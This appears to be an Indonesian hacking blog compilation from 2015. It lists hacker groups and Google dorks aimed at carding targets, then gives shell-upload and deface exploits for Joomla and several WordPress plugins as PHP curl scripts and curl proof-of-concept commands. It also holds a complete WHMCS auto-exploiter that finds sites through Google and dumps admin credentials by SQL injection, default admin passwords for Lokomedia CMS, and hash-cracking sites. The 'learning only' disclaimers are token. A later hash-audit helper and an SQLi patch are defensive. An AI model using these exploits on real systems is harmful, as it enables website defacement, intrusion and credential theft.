
Sunday, 28 June 2015

List of hacker groups across Indonesia

Indonesia Cyber Crew [OFFICIAL]
https://www.facebook.com/groups/IndoCyberCrew/

Java Intelegent Cyber Team [ Publik ]
https://www.facebook.com/groups/1376697492637675/?fref=ts

Dark Defence Cyber Team
https://www.facebook.com/groups/DDCT.Official/?fref=ts

HACKTIVIS
https://www.facebook.com/groups/1545397709040732/?fref=ts

™ NKRI CYBER ATTACKER ™ {диøичмøцs iиδøизsiд}
https://www.facebook.com/groups/878224435575817/?fref=ts

United Indonesian Hackers [ UNIHACK TEAM ]
https://www.facebook.com/groups/UNIHACK.phtml/?fref=ts

Bogor Grey Hacker Team (Official Group)
https://www.facebook.com/groups/bogorgreyhackerteam/?fref=ts

Anonymous Hacker Indonesia feat DarK-JusTice.Ri
https://www.facebook.com/groups/Anonymous.DJRI/?fref=ts

Anonymous Hackers
https://www.facebook.com/groups/tony.hacker/?fref=ts

Bengkulu Hacker Team Official
https://www.facebook.com/groups/Bengkulu.Hacker/?fref=ts

Palembang Hacker Link Chatting Group
https://www.facebook.com/groups/PeHaeL/?ref=ts&fref=ts

RAJAWALI ACEH CYBER TEAM [RACT] OFFICIAL™
https://www.facebook.com/groups/ract.official/?fref=ts

CYBER (Cilacap Young Brother Racing)
https://www.facebook.com/groups/491566220861751/?fref=ts

Show Off Zone [ Cirebon Cyber Crime ]™
https://www.facebook.com/groups/1591442534424330/?ref=ts&fref=ts

Note:
There are actually many more, but those are all I can remember... :D

How to Develop Google Dorks

The dork types I most often use when developing dorks for the Google search engine:
  • Inurl: the website we are targeting; what is meant by inurl here is perhaps ( ' ), which is a trick for seeing whether a website is vulnerable or not.
  • Intext: the words we are looking for; this can cover anything we know, for example.
  • Site: the country address we are targeting; when developing dorks the one used most often is the UK, that is, Site:"UK". You can replace UK with any country's domain to suit your wishes and needs.
  • .php?xx= : the end of an inurl, or of the website address we are targeting.

1. Develop the inurl
2. Develop the intext
3. Develop the Site
4. Develop the .php?xxx=

1. Example inurl:"detail". You can replace it with other words such as:
   1. payment
   2. detail
   3. author
   4. content

2. Example intext:"paypal" [ a word often used for carding pp ]. You can replace it with other words such as:
   1. Master Card
   2. Visa
   3. payza

intext is not always tied to a credit card such as pp/cc. Keep in mind that for a dork you do not have to use all of the parts in a Google search, as in inurl:"content".php?id=" intext:"paypal" Site:"UK"
[ Usually, if we add Site when there is already an intext, no websites will be returned ]
So you can drop either intext or Site.

3. Example Site:"il". You can replace it with other values such as:
   1. UK
   2. US
   3. SG
   4. MY
   5. KR

4. Example .php?id=". You can replace it with other values such as:
   1. .php?cat="
   2. .php?carID="
   3. .php?category="
   4. .php?id="

Deface method: com_aclassif

Joomla Component com_aclassif


The dork: inurl:"index.php?option=com_aclassif"

The exploit: index.php?option=com_aclassif&option=com_aclassif&ct=wlkm_repl&md=add_form&replid=917&fblg=1

First find the site, for example: http://www.amityconnect.com/

Then append the exploit:
/index.php?option=com_aclassif&ct=wlkm_repl&md=add_form&replid=917&fblg=1

Example: http://www.amityconnect.com/index.php?option=com_aclassif&ct=wlkm_repl&md=add_form&replid=917&fblg=1

Then you can fill in all the fields; the bottom one :v can be txt, jpg, etc. :v
After that, submit the ad. Once that is done a "view add" link appears; click view and the result looks like this:

http://www.amityconnect.com/components/com_aclassif/photos/mtmd72920.txt

Web Tools

WordPress Plugin Complete Gallery Manager

Google dork : "inurl:/wp-content/plugins/complete-gallery-manager/

exploit: /wp-content/plugins/complete-gallery-manager/frames/upload-images.php

PHP script:

$uploadfile="asu.php";
$ch = curl_init("http:site/wp-content/plugins/complete-gallery-manager/frames/upload-images.php");
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Shell Upload Access Path : http://site/wp-content/2013/09/asu.php

1. Replace http://site with your target
2. Run the PHP script with XAMPP
3. Enter the shell
4. Deface the index
Com_sexy

Try using this, bro: http://www.server3.com.br/formcraft.php auto exploit. How to use it: enter the URL in the field and click start; if anything is vulnerable, "found" will appear, while "not found" means it is not vulnerable. Leave the 404 string alone. The exploit below it is for locking the target: enter the vulnerable target from the scan above, without ( http:// and www. ), for example for http://localhost.com enter just localhost.com. I deliberately made this part fiddly, in other words I don't know or understand coding, so after you click start the page goes back to the beginning, but that's fine; to bring the previous one back, just re-enter the target and start. Below it there is an upload field, right? Upload your shell, and stay patient. This is actually an admin finder exploit and a com_sexy exploit, but I recoded and combined them. Thanks a lot. AND ONE MORE THING: RESPECT OTHER PEOPLE'S WORK :)

script WHMCS auto exploit

<?php
/*
*****************************************************
  WHMCS Auto Exploiter 5.2.8
*****************************************************
*/

set_time_limit(0);
ini_set('memory_limit', '64M');
header('Content-Type: text/html; charset=UTF-8');
function letItBy(){ ob_flush(); flush(); }
function getAlexa($url)
{
 $xml = simplexml_load_file('http://data.alexa.com/data?cli=10&dat=snbamz&url='.$url);
 $rank1 = $xml->SD[1];
 if($rank1)
  $rank = $rank1->POPULARITY->attributes()->TEXT;
 else
  $rank = 0;
 return $rank;
}
 
function google_that($query, $page=1)
{
 $resultPerPage=8;
 $start = $page*$resultPerPage;
 $url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz={$resultPerPage}&start={$start}&q=" . urlencode($query);
 $resultFromGoogle = json_decode( http_get($url, true) ,true);
 if(isset($resultFromGoogle['responseStatus'])) {
  if($resultFromGoogle['responseStatus'] != '200') return false;
  if(sizeof($resultFromGoogle['responseData']['results']) == 0) return false;
  else return $resultFromGoogle['responseData']['results'];
 }
 else
  die('The function <b>' . __FUNCTION__ . '</b> Kill me :( <br>' . $url );
}
 
function http_get($url, $safemode = false){
 if($safemode === true) sleep(1);
 $im = curl_init($url);
 curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
 curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
 curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
 curl_setopt($im, CURLOPT_HEADER, 0);
 return curl_exec($im);
 curl_close();
}

function check_vuln($url) {
$url = dirname($url) . '/viewticket.php';
$url = str_replace("/admin","",$url);

$post = "tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT GROUP_CONCAT(0x3a3a3a3a3a,id,0x3a,username,0x3a,email,0x3a,password,0x3a3a3a3a3a) FROM tbladmins),0,0,0,0,0,0,0,0,0,0,0#";
$curl_connection = curl_init($url);
if($curl_connection != false) {
 curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 30);
 curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
 curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
 curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false);
 curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);
 curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $post);
 $source = curl_exec($curl_connection);
 preg_match_all('/:::::(.*?):::::/s',$source,$infoz);
 if($infoz[0]) {
  return $infoz[0];
 }
 else
  return "Fail!";
}
else
 return "Fail!";
}
?>
<html>
<head>
<title>WHMCS Auto Xploiter</title>
</head>
<body style="background-image: url('http://th01.deviantart.net/fs71/PRE/i/2013/249/d/4/blue_electric_tiger_by_gb_art3-d6l7rj5.png'); background-size:cover;">

<STYLE>
textarea{background-color:#105700;color:lime;font-weight:bold;font-size: 20px;font-family: Tahoma; border: 1px solid #000000;}
input{FONT-WEIGHT:normal;background-color: #105700;font-size: 15px;font-weight:bold;color: lime; font-family: Tahoma; border: 1px solid #666666;height:20}
body {
font-family: Tahoma
}
tr {
BORDER: dashed 1px #333;
color: #FFF;
}
td {
BORDER: dashed 1px #333;
color: #FFF;
}
.table1 {
BORDER: 0px Black;
BACKGROUND-COLOR: Black;
color: #FFF;
}
.td1 {
BORDER: 0px;
BORDER-COLOR: #333333;
font: 7pt Verdana;
color: Green;
}
.tr1 {
BORDER: 0px;
BORDER-COLOR: #333333;
color: #FFF;
}
table {
BORDER: dashed 1px #333;
BORDER-COLOR: #333333;
BACKGROUND-COLOR: Black;
color: #FFF;
}
input {
border                  : dashed 1px;
border-color            : #333;
BACKGROUND-COLOR: Black;
font: 8pt Verdana;
color: blue;
}
select {
BORDER-RIGHT:  Black 1px solid;
BORDER-TOP:    #DF0000 1px solid;
BORDER-LEFT:   #DF0000 1px solid;
BORDER-BOTTOM: Black 1px solid;
BORDER-color: #FFF;
BACKGROUND-COLOR: Black;
font: 8pt Verdana;
color: blue;
}
submit {
BORDER:  buttonhighlight 2px outset;
BACKGROUND-COLOR: Black;
width: 30%;
color: #FFF;
}
textarea {
border                  : dashed 1px #333;
BACKGROUND-COLOR: Black;
font: Fixedsys bold;
color: #999;
}
BODY {
        SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
margin: 1px;
color: blue;
background-color: Black;
}
.main {
margin                  : -287px 0px 0px -490px;
BORDER: dashed 1px #333;
BORDER-COLOR: #333333;
}
.tt {
background-color: Black;
}
 
A:link {
        COLOR: White; TEXT-DECORATION: none
}
A:visited {
        COLOR: White; TEXT-DECORATION: none
}
A:hover {
        color: blue; TEXT-DECORATION: none
}
A:active {
        color: blue; TEXT-DECORATION: none
}
 
#result{margin:10px;}
#result span{display:block;}
#result .Y{background-color:lime;}
#result .X{background-color:blue;}
</STYLE>
<script language=\'javascript\'>
function hide_div(id)
{
  document.getElementById(id).style.display = \'none\';
  document.cookie=id+\'=0;\';
}
function show_div(id)
{
  document.getElementById(id).style.display = \'block\';
  document.cookie=id+\'=1;\';
}
function change_divst(id)
{
  if (document.getElementById(id).style.display == \'none\')
    show_div(id);
  else
    hide_div(id);
}
</script>
</td></table></tr>
<br>
<br>
<link rel="stylesheet" type="text/css" href="http://fonts.googleapis.com/css?family=Audiowide">
    <style>
      body {
        font-family: 'Audiowide', serif;
        font-size: 30px;
               
      }
    </style>
  </head>

  <body onLoad="type_text()" ; bgColor=#000000 text=#00FFFF">
    <center>
<font face="Audiowide" color="black">WHMCS Auto Exploiter</font>
<br>
<font color="black" size="3">WHMCS ver. </font><font color="black" size="3">5.2.8</font>
</font>
<br><br>

<table border=1 bordercolor=blue>
<tr>
<td width="700">
<br />
<center>
 <form method="post">
  Google Dork: &nbsp;&nbsp;
  <input type="text" id="dork" size="30" name="dork" value="<?php echo (isset($_POST['dork']{0})) ? htmlentities($_POST['dork']) : 'inurl:submitticket.php site:.'; ?>" />
  &nbsp;&nbsp;<input type="submit" value="Crotz!" id="button"/>
  <br><br>
    <select size="20" onchange="document.getElementById('dork').value=this.options[this.selectedIndex].text;">
</select><br /><br />
 </form>
<?php
        if(isset($_POST['dork']{0})) {
                $file = fopen("WMCS-Hashes.txt","a");
                echo '<br /><div id="result"><b>Scanning has been started... Good luck! ;)</b><br><br>';                       
                letItBy();                     
                for($googlePage = 1; $googlePage <= 50; $googlePage++) {
                        $googleResult = google_that($_POST['dork'], $googlePage);
                        if(!$googleResult) {
                                echo 'Finished scanning.';
                                fclose($file);
                                break;
                        }
                       
                        for($victim = 0; $victim < sizeof($googleResult); $victim++){
                                $result = check_vuln($googleResult[$victim]['unescapedUrl']);
                                $alexa = getAlexa($googleResult[$victim]['unescapedUrl']);
                                if($result != "Fail!") {
                                        $hashes = "";
                                        foreach ($result as $record) {
                                                $hashes = $hashes . str_replace(':::::','',$record) . "\n";
                                        }
                                        $sep = "========================================================\n";
                                        $data = $sep . $googleResult[$victim]['unescapedUrl'] . " - Alexa: " .$alexa. "\n" . $sep . $hashes . "\n";
                                        fwrite($file,$data);
                                        echo "<br /><font color=\"green\">Successfully Xploited...</font>";
                                        echo '<span class="Y">';
                                        echo "<pre>" . $data . "</pre></span><br />";
                                       
                                }
                                else {
                                echo '<span class="X">';
                                echo "<a href=\"{$googleResult[$victim]['unescapedUrl']}\" target='_blank'>{$googleResult[$victim]['titleNoFormatting']}</a> - <font color=\"black\">Failed!</font>";
                                echo "</span>\n<br />";
                                }
                                letItBy();
                        }
                }
                echo '</div>';
        }
?>
</center>
</td>
</table>
<br /><br />
<font face="Audiowide" color="blue" size="4">
Coded by: <font color="blue">Mr.chucky</font><br />
<br />Kunjungi Juga <a href="www.cireboncybercrime.org" target="_blank" style="text-decoration: none;">www.cireboncybercrime.org</a>
</font>

</center>
</body>
</html>

How to Develop Dorks

.::Basics::.

Inurl: the website we are targeting; what is meant by inurl here is probably ( ' ), which is a trick to see whether a website is vulnerable or not.
Intext: the words we are aiming for; this can cover everything we know, for example.
Site: the country address we are targeting; when developing dorks, the most frequently used country is the UK, that is, Site:"UK"
NB: You can replace UK with the domain of any country, according to your wishes and needs.
.php?xx= : the end of an inurl, or of the website address we are targeting.

.::Steps::.

1. Develop the inurl
2. Develop the intext
3. Develop the Site
4. Develop the .php?xxx=

.::Examples::.

1. Example: inurl:"detail"
You can replace it with other words such as:
   1. payment
   2. detail
   3. author
   4. content
2. Example: intext:"paypal" [a word often used for PayPal carding]
You can replace it with other words such as:
   1. Master Card
   2. Visa
   3. payza
intext is not always tied to a credit card such as pp/cc. Keep in mind that for a dork you do not have to use all of the operators in a Google search.
For example: inurl:"content".php?id=" intext:"paypal" Site:"UK"
[ Usually, if we add Site when there is already an intext, no websites will be available ]
So you can drop either intext or site.
3. Example: Site:"il"
You can replace it with other words such as:
   1. UK
   2. US
   3. SG
   4. MY
   5. KR
4. Example: .php?id="
You can replace it with other words such as:
   1. .php?cat="
   2. .php?carID="
   3. .php?category="
   4. .php?id="

SOME EXAMPLES OF DEVELOPED DORKS:
inurl:"content" .php?category=" intext:"Visa"
inurl:".php?carID="" intext:"shopping"

Exploit WordPress Fluid_forms Upload Vulnerability

Dork : inurl:fluid_forms
exploit : /wp-content/plugins/fluid_forms/file-upload/server/php/

CSRF : I wrote it in the comments :D



shell access :
/wp-content//plugins//fluid_forms/file-upload/server/php/files/shellname.php

*.:: the method is the same as for Formcraft ::.

Source : Slemanroot.net

ThisWay file upload

*use XAMPP

Dork : inurl:"/wp-content/themes/ThisWay/"
Exploit : /wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php

Script PHP :

$uploadfile="jiwa.php";
$ch = curl_init("SlemanGetar.com/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php");
curl_setopt($ch, CURLOPT_POST, true); 
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

Source: Slemanroot.net

**going on a short hiatus

WP Pitch Print

Dork: inurl:"inurl:/wp-content/plugins/pitchprint/"
Exploit : Vulnerability:/wp-content/plugins/pitchprint/uploader/

CSRF :

enctype="multipart/form-data">
Upload


shell:
/wp-content/plugins/pitchprint/uploader/file/*shell name*
happy learning

Warning: any form of misuse is not the fault of TS. This is for learning only.

Thanks, source: slemanroot.net

WP Atom Themes Arbitrary File Upload

Get XAMPP ready right away

  • Dork : inurl:"/wp-content/themes/atom/"
  • Exploit: /wp-content/themes/atom/uploadify/uploadify.php
script php:

$uploadfile="nama_shell_mu.php";

$ch = curl_init("www.target.com/wp-content/themes/atom/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

**you know how to use it, right? :*

Exploit Wp Easy Gallery Pro Vulnerability

Dork: inurl:"wp-easy-gallery-pro"
Vulnerable & Exploits: /wp-content/plugins/wp-easy-gallery/admin/php.php
csrf:

form enctype="multipart/form-data"
shell access: /wp-content/uploads/jiwa.php

usage is the same as for Formcraft

Note:
Any form of misuse is not my responsibility. This is for knowledge only. (You bear your own sins :p )

Thanks ^_^

the bonus
http://www.4shared.com/photo/Gy1Df_eFba/CBzMLh2UoAA3XSqjpg_large.html :v :v :p

Vuln


Lokomedia CMS vulnerability [new ver]

Dork: content.php?module=user

then enter the exploit:
/adminweb ,
/admin ,
/administrator
*look for the admin page

default user and pass

admin:admin
wiro:sableng
wiros:sabdi
joko:sembung
sinto:gendeng

hopefully you find a site where the default admin user and pass have not been changed yet

by : Anonim Dot ID

Note:
for learning only; misuse is outside the responsibility of TS (you bear your own sins)

List of president.gov.il emails


How To Remote Exploit Wordpress Ninetofive

Use a CGI shell; download it here: http://adf.ly/1DRAlE pass: webr00t

  • Dork: inurl:/wp-content/themes/ninetofive
  • Exploits: /wp-content/themes/ninetofive/scripts/doajaxfileupload.php
  • Vulnerability: {"error":"No files were uploaded."}
  • Command: curl -v -F "qqfile=@jiwa.php" "http://localhost/wp-content/themes/ninetofive/scripts/doajaxfileupload.php"
Note:
First upload the shell you want to run remotely from the CGI shell to the target web
Enter the command according to your shell name and target site; don't get it wrong, dear =))

Set-Cookie: PixelAttached_1=%2Fhome%2Fsciencef%2Fpublic_html%2Flocalhost%2Fwp-content%2Fuploads%2F2015%2F03%2Fjiwa_551a89b87c7d7.php; expires=Tue, 31-Mar-2015 12:49:12 

jiwa_551a89b87c7d7.php is our resulting shell (oh, and the shell name can change unpredictably)

Result: /wp-content/uploads/2015/04/jiwa.php (for details, look at the result of the command)

nb: for learning only; misuse is outside the responsibility of the admin (you bear your own sins)

Thanks (matur suwun): slemanroot.net, more specifically bro Sinkaroid

Types of Hashes & Encryption

1. MD4 (Message-Digest algorithm 4)
– MD4 was created by Ronald Rivest in October 1990. MD4 is the hash function that was used before MD5, but because of its many weaknesses MD4 was replaced by MD5.
– length 16 bytes (32 characters)
– example : 31d6cfe0d16ae931b73c59d7e0c089c0

2. MD5 (Message-Digest algorithm 5)

– MD5 was designed by Ronald Rivest in 1991 to replace the earlier hash function, MD4. In 1996 (http://id.wikipedia.org/wiki/MD5)
– used in phpBB v2.x, Joomla versions below 1.0.13, and by several CMSs and forums
– length 16 bytes (32 characters)
– example : c4ca4238a0b923820dcc509a6f75849b

3. MD5($pass.$salt)

– Used in WB News, Joomla version 1.0.13 and later
– length 16 bytes (32 characters)
– this hash starts with the hash first, followed by the salt
– example : 6f04f0d75f6870858bae14ac0b6d9f73

4. MD5($salt.$pass)

– Used in osCommerce, AEF, Gallery and several other CMSs
– length 16 bytes (32 characters)
– this hash starts with the salt first, followed by the hash
– example : f190ce9ac8445d249747cab7be43f7d

5. md5(md5($pass).$salt)

– Used in vBulletin, IceBB and other CMSs
– length 16 bytes (32 characters)
– example : 6011527690eddca23580955c216b1fd2

6. MD5(WordPress)

– Used in WordPress
– length 17 bytes (34 characters)
– the hash starts with the marker $P$, followed by one character (the most commonly used character is the letter “B”), then the salt (8 randomly arranged characters; in this example the salt is “12345678”), and then the hash
– example : $P$B123456780BhGFYSlUqGyE6ErKErL01

7. MD5(phpBB3)

– Used in the phpBB 3.x.x CMS
– length 17 bytes (34 characters)
– the hash starts with the marker $H$, followed by one character (the most commonly used character is the number “9”), then the salt (8 randomly arranged characters; in the example I give the salt is “12345678”), and then the hash
– example : $H$9123456785DAERgALpsri.D9z3ht120

8. SHA-1 (Secure Hash Algorithm)

– Created by the National Institute of Standards and Technology or U.S. Federal Information Processing Standard; used by several CMSs and several forums
– length 20 bytes (40 characters)
– example : 356a192b7913b04c54574d18c28d46e6395428ab

9. SHA-256 (Secure Hash Algorithm)

– the hash starts with the marker $5$, followed by the salt (8 randomly arranged characters; in the example I give the salt is “12345678”), then the character “$”, and then the hash
– length 55 characters
– example : $5$12345678$jBWLgeYZbSvREnuBr5s3gp13vqi…

10. SHA-512 (Secure Hash Algorithm)

– the hash starts with the marker $6$, followed by the salt (8 randomly arranged characters; in the example I give the salt is “12345678”), then the character “$”, and then the hash
– length 98 characters
– example : $6$12345678$U6Yv5E1lWn6mEESzKen42o6rbEm…

11. Base64
– an algorithm for encoding and decoding data into ASCII format. Maximum length 64 characters; the hash consists of A..Z, a..z and 0..9, plus two final symbol characters, + and /, and one equals character “=”
– used in several forums and CMSs
– example : Y3liZXJfY3JpbWluYWw=

Sites for cracking hashes:
http://www.md5decrypter.co.uk/ => decrypt MD5
http://www.md5decrypter.co.uk/sha1-decrypt.aspx => decrypt SHA1
http://base64-encoder-online.waraxe.us/ => decode/encode base64
and many more
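The formats listed above are what a defender needs in order to audit a credential table for schemes that should be migrated. The following is an added example, not code from the original page: it classifies stored values by those formats and decodes the phpass cost character into an iteration count. The risk labels, the function names and the sample table are assumptions made for illustration.

```python
import base64
import binascii
import re

# phpass alphabet; the position of the cost character is log2(iterations).
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
_C = r"[./0-9A-Za-z]"

PHPASS = re.compile(rf"^\$([PH])\$({_C})({_C}{{8}})({_C}{{22}})$")
SHACRYPT = re.compile(rf"^\$([56])\$(?:rounds=(\d+)\$)?([^$]{{1,16}})\$({_C}+)$")
SHACRYPT_DIGEST_LEN = {"5": 43, "6": 86}
HEX = re.compile(r"^[0-9a-fA-F]+$")
BASE64 = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def classify(stored):
    """Return (scheme, risk, detail) for one stored credential string.

    The risk labels (critical / weak / legacy / ok / review) are this
    example's own convention, not taken from the page.
    """
    m = PHPASS.match(stored)
    if m:
        app = "WordPress" if m.group(1) == "P" else "phpBB3"
        iterations = 1 << ITOA64.index(m.group(2))
        return (f"phpass/{app}", "legacy", f"salted MD5, {iterations} iterations")

    m = SHACRYPT.match(stored)
    if m and len(m.group(4)) == SHACRYPT_DIGEST_LEN[m.group(1)]:
        name = "sha256crypt" if m.group(1) == "5" else "sha512crypt"
        rounds = int(m.group(2)) if m.group(2) else 5000  # 5000 is the scheme default
        return (name, "ok", f"salted, {rounds} rounds")

    # Hex goes before Base64: every hex digest is also valid Base64 text.
    if HEX.match(stored):
        if len(stored) == 32:
            # MD4, MD5 and the salted MD5 variants all look like this.
            return ("md4/md5-family", "weak", "fast 128-bit digest")
        if len(stored) == 40:
            return ("sha1", "weak", "fast 160-bit digest")
        return ("unknown", "review", f"{len(stored)} hex characters")

    if BASE64.match(stored) and len(stored) % 4 == 0:
        try:
            plain = base64.b64decode(stored, validate=True)
        except (binascii.Error, ValueError):
            plain = b""
        # Heuristic: only call it Base64 if it decodes to printable ASCII.
        if plain and all(32 <= b < 127 for b in plain):
            return ("base64", "critical", "reversible encoding, not a hash")

    return ("unknown", "review", "no known format")


def audit(rows):
    """Group (user, stored) rows by risk: {risk: [(user, scheme, detail), ...]}."""
    report = {}
    for user, stored in rows:
        scheme, risk, detail = classify(stored.strip())
        report.setdefault(risk, []).append((user, scheme, detail))
    return report


# Constructed table: user names are invented; values are the page's examples,
# except the $6$ row, whose digest is filler because the page truncates it.
SAMPLE_ROWS = [
    ("u1", "c4ca4238a0b923820dcc509a6f75849b"),
    ("u2", "356a192b7913b04c54574d18c28d46e6395428ab"),
    ("u3", "$P$B123456780BhGFYSlUqGyE6ErKErL01"),
    ("u4", "$H$9123456785DAERgALpsri.D9z3ht120"),
    ("u5", "$6$12345678$" + "a" * 86),
    ("u6", "Y3liZXJfY3JpbWluYWw="),
    ("u7", "f190ce9ac8445d249747cab7be43f7d"),  # 31 hex characters as printed
]

if __name__ == "__main__":
    for risk, entries in sorted(audit(SAMPLE_ROWS).items()):
        for user, scheme, detail in entries:
            print(f"{risk:8} {user} {scheme}: {detail}")
```

A 32-character hex value cannot be narrowed further than "MD4/MD5 family" from its shape alone, which is why the salted variants in items 3 to 5 land in the same bucket as plain MD5.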

Patching an SQLi Bug

$content=mysql_fetch_object(mysql_query("SELECT * FROM ".SB_TBL_DYNAMIC." WHERE content_id ='".$_GET['content_id']."'")); ?>

There is no filter.
 Code:

error_reporting(0);
// Allow only a non-negative integer id; anything else ends the request.
function filtering($content_id){
    $idf = mysql_real_escape_string($content_id);
    if (!ctype_digit($idf) || $idf < 0){ exit; } else { return $idf; }
}
$id = filtering($_GET['content_id']);

so it becomes like this

error_reporting(0);
// Allow only a non-negative integer id; anything else ends the request.
function filtering($content_id){
    $idf = mysql_real_escape_string($content_id);
    if (!ctype_digit($idf) || $idf < 0){ exit; } else { return $idf; }
}
// Use the filtered value in the query, never $_GET directly.
// mysql_* was removed in PHP 7; on current PHP use a prepared statement (PDO or mysqli).
$id = filtering($_GET['content_id']);
$content=mysql_fetch_object(mysql_query("SELECT * FROM ".SB_TBL_DYNAMIC." WHERE content_id ='".$id."'")); ?>


Note:
if this is wrong, please correct me :D

WPA2, WEP, WAP, TKIP

WEP
WEP is the first security and encryption standard used on wireless networks. WEP (Wired Equivalent Privacy) is a method of securing wireless networks, also called Shared Key Authentication. Shared Key Authentication is an authentication method that requires the use of WEP.

WEP encryption uses a key that is entered (by the administrator) on both the client and the access point. The key that the access point gives to the client must match the key that the client enters to authenticate to the access point. WEP has the 802.11b standard.
The Shared Key Authentication process:
1. The client requests association with the access point; this step is the same as in Open System Authentication.
2. The access point sends a challenge text to the client transparently.
3. The client responds by encrypting the challenge text with the WEP key and sending it back to the access point.
4. The access point responds to the client's reply: it decrypts the client's encrypted response to verify that the challenge text was encrypted with the matching WEP key. In this step the access point determines whether the client has supplied the correct WEP key. If the WEP key supplied by the client is correct, the access point responds positively and authenticates the client immediately. If the WEP key entered by the client is wrong, the access point responds negatively and the client is not authenticated. The client is then neither authenticated nor associated.
WEP has various weaknesses, among them:
  • The weak-key problem: the RC4 algorithm that is used can be broken.
  • WEP uses a static key.
  • The WEP initialization vector (IV) problem.
  • The message-integrity problem of the Cyclic Redundancy Check (CRC-32).
WEP comes in two levels, 64-bit and 128-bit keys. The secret key in a 64-bit WEP key is actually only 40 bits, while 24 bits are the initialization vector (IV). Likewise, in a 128-bit WEP key the secret key consists of 104 bits.
Attacks on WEP's weaknesses include:
  • Attacks on the weakness of the initialization vector (IV), often called the FMS attack. FMS stands for the names of the three discoverers of the IV weakness: Fluhrer, Mantin and Shamir. The attack is carried out by collecting as many weak IVs as possible. The more weak IVs are obtained, the faster the key in use is found.
  • Obtaining unique IVs from captured data packets and processing them to crack the WEP key faster. This method is called the chopping attack and was first discovered by h1kari. The technique needs only unique IVs, which reduces the need for weak IVs when cracking WEP.
Both attacks above need enough time and enough packets. To shorten the time, hackers usually perform traffic injection. The most common form of traffic injection is to collect ARP packets and send them back to the access point, which makes collecting initialization vectors easier and faster. Unlike the first and second attacks, traffic injection requires particular hardware and software that are becoming hard to find in shops, from the chipset, firmware version and driver version onward, and it often requires patching the driver and the application.

WAP
Wireless Application Protocol, abbreviated WAP, is an open international standard for applications that use wireless communication. Its main purpose is to build applications that can access the internet from a mobile phone or PDA.

Abbreviated as WAP.
A standard protocol for wireless applications (such as those used on mobile phones). WAP is a protocol or messaging-service technique that allows a digital phone or mobile terminal with WAP capability to view or read the content of an internet site in a special text format. The internet site must be a WAP-enabled site.

This technology is the result of cooperation across the industry to create an open standard that is based on Internet standards, together with several protocols that have been optimized for the wireless environment.

This technology works in text mode at a speed of about 9.6 kbps. More recently the GPRS protocol was also developed, which has several advantages over WAP.

Wireless Application Protocol is a protocol developed from existing wireless data protocols. Phone.com created a version of the standard HTML (HyperText Markup Language) Internet protocol designed specifically for efficient transfer of information between mobile networks. Wireless terminals with the HDML (Handheld Device Markup Language) microbrowser and Phone.com's Handheld Device Transport Protocol (HDTP) connect to the UP.Link Server Suite, which in turn connects to the Internet or intranet where the required information resides. This technology is what later became known as WAP.

WPA2
WPA2 is a product certification available through the Wi-Fi Alliance. WPA2 certification simply states that wireless equipment is compatible with the IEEE 802.11i standard. The WPA2 product certification officially replaces Wired Equivalent Privacy (WEP) and the other security features of the original IEEE 802.11 standard. The goal of WPA2 certification is to support the additional mandatory security features of the IEEE 802.11i standard that are not already included in products that support WPA.

TKIP
In computing, TKIP or Temporal Key Integrity Protocol is a protocol defined by IEEE 802.11i specifically for wireless networks, to replace WEP. TKIP was designed to replace WEP without changing or replacing the hardware. This was necessary because the “poor” security of WEP left wireless networks without working link-layer protection, and a solution to this problem could not wait for the hardware to be replaced. For that reason TKIP (read: tee-kip), like WEP, uses a key scheme based on RC4, but unlike WEP, TKIP encrypts every data packet sent with its own unique encryption key.

TKIP provides per-packet key mixing, a message integrity check and a re-keying mechanism, and in this way addresses the security issues of WEP. This makes decoding the key more complex by reducing the amount of data available to a cracker that has been encrypted under one particular key.

Remote Wp Exploit n-media

Google dork: index of website-contact-form-with-file-upload
                          index of /uploads/contact_files/
You can also use the plugin path to search for the dork,
Ex: /plugins/website-contact-form-with-file-upload/ site:.com

Here I use a CGI shell for the exploitation. Actually this exploit only works on Linux, but it can be done remotely, so relax =))
Usage is the same as for the Ninetofive exploit; you can see it here, bro
[ https://www.facebook.com/notes/dark-defence-cyber-team/how-to-remote-exploit-wordpress-ninetofive/1578809292394711 ]

Vulnerable: The "upload_file()" ajax function is affected by an unrestricted file upload vulnerability.

# PoC:

 curl -k -X POST -F "action=upload" -F "Filedata=@jiwa.php" -F "action=nm_webcontact_upload_file" http://VICTIM/wp-admin/admin-ajax.php
 
 
Result: {"status":"uploaded","filename":"1427927588-jiwa.php"}

# Backdoor Location:

http://VICTIM/wp-content/uploads/contact_files/1427927588-jiwa.php

Note:
